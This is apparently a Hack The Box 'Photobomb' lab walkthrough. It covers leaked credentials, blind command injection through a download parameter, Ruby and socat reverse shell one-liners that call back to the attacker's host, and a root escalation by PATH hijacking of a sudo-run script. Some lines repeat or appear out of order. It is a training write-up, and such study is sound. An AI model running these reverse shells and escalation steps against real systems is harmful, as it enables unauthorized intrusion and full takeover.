Hackthebox - Photobomb
Last updated
Last updated
We need to add a line to our /etc/hosts/ file like this 10.10.11.182 photobomb.htb
Clicking on the link will open a prompt to login
Looking at the code we find this
Great we have credentials pH0t0:b0Mb! using these we are able to login
Nothing here. Most endpoints give this 404 page.
Here is the code of the page
Let's play a little with the download feature
Photobomb kinda reminds me about zipbomb (the attack) but we do not have an upload form at the moment.
It seems like we should focus on injection or path traversal vulnerabilities.
Let's use burp intruder for some fuzzing. Looking at the results, we get some interesting backtrace.
Trying out a wget in the filtype parameter in a server on my kali does something. Doing a whoami however won't work because we do not get the output as it is blind command injection.
We start a local webserver python3 -m http.server 80
Using this we could launch a reverse shell
This one in ruby looses the connection right away ruby -rsocket -e'f=TCPSocket.open("10.10.14.2",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
We are the user wizard. Let's grab the user flag
Let's get a better shell with a socat binary
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O socat from your kali
Then we put on our python web server python3 -m http.server 80
We also set up a listener with socat
Then we go to a writable directory wget http://10.10.14.2/socat
chmod +x socat
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.2:4445`
We take linpeas and launch it
Interesting input to investigate further
There is an interesting cronjob.
Here is the content of /opt/cleanup.sh
Also we can set the env for /opt/cleanup.sh and run it without the root password. See sudo -l result here
The cleanup script uses the find command. We could make our own find command and change the path.
INSIDER TIP: Don't do like me do not forget to chmod +x your malicious find script... -_-'
So here is the process
Create your own malicious find command. Here is mine (it will lauch root shell but you could also make a reverse shell for example)
Get it in your target (you can also write your script from the target with echo) wget http://10.10.14.2/find
Make your script executable chmod +x find
Set the path sudo PATH=/home/wizard/photobomb:$PATH /opt/cleanup.sh this way the find command will be fetch where you want here in the photobomb folder
You should be root in a very few seconds
We can grab the root flag
When browsing to http://photobomb.htb/ we end up here
We can note here the presence of , and keep it aside for later.
See the results here
See the backtrace we get
We launch a wget through burp repeater. It has to be url encoded, we can do it easily with burp inspector or ctr+U
We can see that it works
Our are not successful.
has another option for us ruby -rsocket -e'exit if fork;c=TCPSocket.new("10.10.14.2","4444");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'
This one does not die on us and we get a shell!
We get a more decent shell this way
